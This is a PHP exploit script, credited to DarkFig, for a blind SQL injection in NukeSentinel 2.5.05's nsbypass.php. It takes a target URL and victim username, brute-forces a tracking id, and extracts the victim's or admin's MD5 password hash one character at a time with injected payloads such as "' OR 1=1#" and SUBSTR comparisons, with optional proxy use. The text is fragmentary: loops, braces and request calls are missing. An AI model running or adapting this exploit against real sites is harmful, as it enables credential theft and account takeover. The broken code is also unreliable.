NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from
error_reporting(E_ALL ^ E_NOTICE);
# (changes.txt)
# 2.5.05 CHANGES (2007-01-22):
# + Includes IP2Country 2007-01-19 updated imports.
# - Both data and sql versions. (Not in upgrade package)
# + Moved nsbypass.php into the includes directory (Per User Requests).
# Prior versions may also be vulnerable but this exploit will not work
# for these versions (because the file 'nsbypass.php' is not into the
# includes directory).
if($argc < 5) {
NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated), track_active=1
Credits: DarkFig <gmdarkfig@xxxxxxxxx>
Support us: Just click once on our publicity ;)
Usage: $argv[0] -url <url> -victim <username> [Opts]
Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?
-prefix Table prefix (default=nuke)
-tid If you have already used this sploit
-bf You can precise how many hits we can try
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
"); exit(1);
$url = getparam('url',1); #
$login = getparam('victim',1); # Default # Victim
(root for example)
$admin = (getparam('isadmin')!='') ? getparam('isadmin') : 0;
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'nuke';
$tid = (getparam('tid')!='') ? getparam('tid') : 0;
$nbtst = (getparam('bf')!='') ? getparam('bf') : 10000;
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
# +nukesentinel.php
# 49. if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND
!is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`,
`username`, `date`, `ip_addr`, `ip_long`, `page`,
# `user_agent`, `refered_from`, `x_forward_for`,
`client_ip`, `remote_addr`, `remote_port`, `request_method`,
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."',
'$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."',
'".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."',
'".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
# '".$nsnst_const['remote_port']."',
'".$nsnst_const['request_method']."', '$c2c')");
# We insert a row in $prefix."_nsnst_tracked_ips".
print "\nInserting a row in ${prfix}_nsnst_tracked_ips";
# Trying to find a valid tid.
# Needed for $tum > 0.
print "\nTrying to find a valid tid (max hits=$nbtst)";
$sql = "' OR 1=1#";
$tid = $c;
print "\nValid tid found: $tid\nHash: $login -> ";
if($c == $nbtst) exit("\n#1 Exploit failed");
# MD5 hash length [32]
# MD5 charset [a-f0-9]
# +nsbypass.php
# 24. $num = $db->sql_numrows($db->sql_query("SELECT * FROM
".$prefix."_authors WHERE `aid`='$a_aid' AND `pwd`='$a_pas'"));
# 25. $tum = $db->sql_numrows($db->sql_query("SELECT * FROM
".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
if($admin) $sql = "$login' AND SUBSTR(pwd,$a,1)=CHAR($b)#";
else $sql = "' OR SUBSTR((SELECT user_password FROM
${prfix}_users WHERE username='$login'),$a,1)=CHAR($b)#";
# +nsbypass.php
# 16. $tid = intval($tid);
# 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin']))
# 18. $abadmin = base64_decode($_COOKIE['admin']);
# 19. $abadmin = explode(":", $abadmin);
# 20. $a_aid = "$abadmin[0]";
# 21. $a_pas = "$abadmin[1]";
# 22. }
# +nsbypass.php
# 27. if($num > 0 AND $tum > 0) {
# 28. $row = $db->sql_fetchrow($db->sql_query("SELECT * FROM
".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
# 29. $row['refered_from'] =
html_entity_decode($row['refered_from'], ENT_QUOTES);
# 30. header("Location: ".$row['refered_from']);
# 31. } else {
# 32. header("Location: ".$nuke_config['nukeurl']);
# 33. }
print strtolower(chr($b));
# MD5 hash do not contains g (char(71)) ... WTF !?
if($b == 71) exit("\n#2 Exploit failed");
# -url ""
# -url
# getparam('url',1)
function getparam($param,$opt='')
global $argv;
foreach($argv as $value => $key)
if($key == '-'.$param) return $argv[$value+1];
if($opt) exit("\n#3 -$param parameter required");
else return;